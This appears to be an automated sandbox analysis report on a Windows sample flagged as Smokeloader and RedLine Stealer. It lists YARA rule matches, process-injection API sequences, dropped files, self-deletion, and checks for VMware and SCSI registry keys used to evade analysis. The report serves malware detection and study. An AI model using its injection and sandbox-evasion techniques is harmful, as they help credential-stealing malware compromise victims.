    Source: explorer.exe, 00000002.00000000.2049916857.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
    Source: explorer.exe, 00000002.00000000.2046464539.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
    Source: explorer.exe, 00000002.00000000.2046464539.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Source: Yara matchFile source: 00000000.00000002.2058725868.0000000004140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000002.2298532365.00000000041D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000002.2298471164.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.2058891382.00000000042F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

    System Summary

    barindex
    Source: 00000000.00000002.2058725868.0000000004140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000000.00000002.2058699871.0000000004130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000000.00000002.2059007895.0000000004344000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000006.00000002.4450918361.0000000004136000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000004.00000002.2298449396.00000000041A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000004.00000002.2298381632.0000000004064000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000004.00000002.2298532365.00000000041D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000004.00000002.2298471164.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000000.00000002.2058891382.00000000042F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000006.00000002.4451244629.0000000005C60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_004013ED NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004013ED
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_00401507 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401507
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_00401518 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401518
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_0040141C NtAllocateVirtualMemory,0_2_0040141C
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_0040151C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040151C
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_0040142C NtAllocateVirtualMemory,0_2_0040142C
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_004032D5 GetModuleHandleA,NtMapViewOfSection,NtQuerySystemInformation,NtQueryKey,RtlCreateUserThread,wcsstr,0_2_004032D5
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_004014E2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014E2
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_004013EC NtAllocateVirtualMemory,0_2_004013EC
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_004014ED NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014ED
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_004013F9 NtAllocateVirtualMemory,0_2_004013F9
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_00402381 NtQuerySystemInformation,0_2_00402381
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_004013ED NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004013ED
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_00401507 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401507
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_00401518 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401518
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_0040141C NtAllocateVirtualMemory,4_2_0040141C
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_0040151C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_0040151C
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_0040142C NtAllocateVirtualMemory,4_2_0040142C
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_004032D5 GetModuleHandleA,NtCreateSection,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,NtQueryKey,NtEnumerateKey,RtlCreateUserThread,strstr,tolower,towlower,4_2_004032D5
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_004014E2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014E2
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_004013EC NtAllocateVirtualMemory,4_2_004013EC
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_004014ED NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014ED
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_004013F9 NtAllocateVirtualMemory,4_2_004013F9
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_00402381 NtQuerySystemInformation,4_2_00402381
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 6_2_00402381 NtQuerySystemInformation,6_2_00402381
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_0040F8140_2_0040F814
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_00410DD20_2_00410DD2
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_0040F8144_2_0040F814
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_00410DD24_2_00410DD2
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 6_2_0040F8146_2_0040F814
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 6_2_00410DD26_2_00410DD2
    Source: rBwTlpgnjc.exe, 00000000.00000002.2058606981.0000000004023000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFirezer( vs rBwTlpgnjc.exe
    Source: rBwTlpgnjc.exeBinary or memory string: OriginalFilenameFirezer( vs rBwTlpgnjc.exe
    Source: rBwTlpgnjc.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000000.00000002.2058725868.0000000004140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000000.00000002.2058699871.0000000004130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000002.2059007895.0000000004344000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000006.00000002.4450918361.0000000004136000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000004.00000002.2298449396.00000000041A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000004.00000002.2298381632.0000000004064000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000004.00000002.2298532365.00000000041D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000004.00000002.2298471164.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000000.00000002.2058891382.00000000042F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000006.00000002.4451244629.0000000005C60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: classification engineClassification label: mal100.troj.evad.winEXE@3/2@6/2
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_0434B756 CreateToolhelp32Snapshot,Module32First,0_2_0434B756
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ivfjsrsJump to behavior
    Source: rBwTlpgnjc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: rBwTlpgnjc.exeVirustotal: Detection: 44%
    Source: unknownProcess created: C:\Users\user\Desktop\rBwTlpgnjc.exe "C:\Users\user\Desktop\rBwTlpgnjc.exe"
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\ivfjsrs C:\Users\user\AppData\Roaming\ivfjsrs
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\ivfjsrs C:\Users\user\AppData\Roaming\ivfjsrs
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeSection loaded: msvcr100.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\ivfjsrsSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\ivfjsrsSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\ivfjsrsSection loaded: msvcr100.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\ivfjsrsSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\ivfjsrsSection loaded: msvcr100.dllJump to behavior
    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
    Source: rBwTlpgnjc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: rBwTlpgnjc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: rBwTlpgnjc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: rBwTlpgnjc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: rBwTlpgnjc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: rBwTlpgnjc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: rBwTlpgnjc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: C:\xohayajixapeh mon-muvicupifujuja\rohagi_cedepamavosan.pdb source: rBwTlpgnjc.exe, ivfjsrs.2.dr
    Source: Binary string: C:\xohayajixapeh mon-muvicupifujuja\rohagi_cedepamavosan.pdb source: rBwTlpgnjc.exe, ivfjsrs.2.dr
    Source: rBwTlpgnjc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: rBwTlpgnjc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: rBwTlpgnjc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: rBwTlpgnjc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: rBwTlpgnjc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

    Data Obfuscation

    barindex
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeUnpacked PE file: 0.2.rBwTlpgnjc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Roaming\ivfjsrsUnpacked PE file: 4.2.ivfjsrs.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Roaming\ivfjsrsUnpacked PE file: 6.2.ivfjsrs.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_00401205 push ecx; iretd 0_2_00401211
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_00401735 push eax; retf 0_2_00401737
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_004031E3 push eax; ret 0_2_004032BE
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_00410FC0 push eax; ret 0_2_00410FDE
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_0413126C push ecx; iretd 0_2_04131278
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_0435962F push edx; retf 0_2_0435963D
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_04352E00 push edx; retf 0_2_04352E01
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_04353175 push edx; ret 0_2_0435317A
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_04359CB2 push edi; retf 0_2_04359CB5
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_04351FB9 push esi; ret 0_2_04351FBA
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_043446BA push esi; retf 0_2_043446BD
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_0434FB96 push cs; retf 0_2_0434FB97
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_04359D82 push edx; retf 0_2_04359D85
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_0434468A push esi; retf 0_2_0434468D
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_0434C3F3 push ecx; iretd 0_2_0434C3FF
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_043594EA push edx; retf 0_2_043594ED
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_043594DC push edi; retf 0_2_043594DD
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_04359BCC push edx; retf 0_2_04359BCD
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_04359ACA push edi; retf 0_2_04359ACD
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_00401205 push ecx; iretd 4_2_00401211
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_00401735 push eax; retf 4_2_00401737
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_004031E3 push eax; ret 4_2_004032BE
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_00410FC0 push eax; ret 4_2_00410FDE
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_04073245 push edx; ret 4_2_0407324A
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_0406FC66 push cs; retf 4_2_0406FC67
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_04072089 push esi; ret 4_2_0407208A
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_0406C4C3 push ecx; iretd 4_2_0406C4CF
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_04072ED0 push edx; retf 4_2_04072ED1
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_041A126C push ecx; iretd 4_2_041A1278
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 6_2_00401205 push ecx; iretd 6_2_00401211
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 6_2_004031E3 push eax; ret 6_2_004032BE
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ivfjsrsJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ivfjsrsJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\rbwtlpgnjc.exeJump to behavior
    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\ivfjsrs:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\ivfjsrsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\ivfjsrsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\ivfjsrsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\ivfjsrsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\ivfjsrsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\ivfjsrsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\ivfjsrsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\ivfjsrsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\ivfjsrsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\ivfjsrsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\ivfjsrsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\ivfjsrsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: ivfjsrs, 00000004.00000002.2298319014.000000000405E000.00000004.00000020.00020000.00000000.sdmp, ivfjsrs, 00000006.00000002.4450947040.000000000414E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 395Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1690Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 885Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 387Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2929Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 862Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 887Jump to behavior
    Source: C:\Windows\explorer.exe TID: 5836Thread sleep count: 395 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 5812Thread sleep count: 1690 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 5812Thread sleep time: -169000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 5892Thread sleep count: 885 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 5892Thread sleep time: -88500s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 4912Thread sleep count: 250 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 4688Thread sleep count: 387 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 4688Thread sleep time: -38700s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 4480Thread sleep count: 343 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 4480Thread sleep time: -34300s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 5812Thread sleep count: 2929 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 5812Thread sleep time: -292900s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\ivfjsrsLast function: Thread delayed
    Source: explorer.exe, 00000002.00000000.2044572626.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
    Source: explorer.exe, 00000002.00000000.2046464539.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
    Source: explorer.exe, 00000002.00000000.2046464539.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
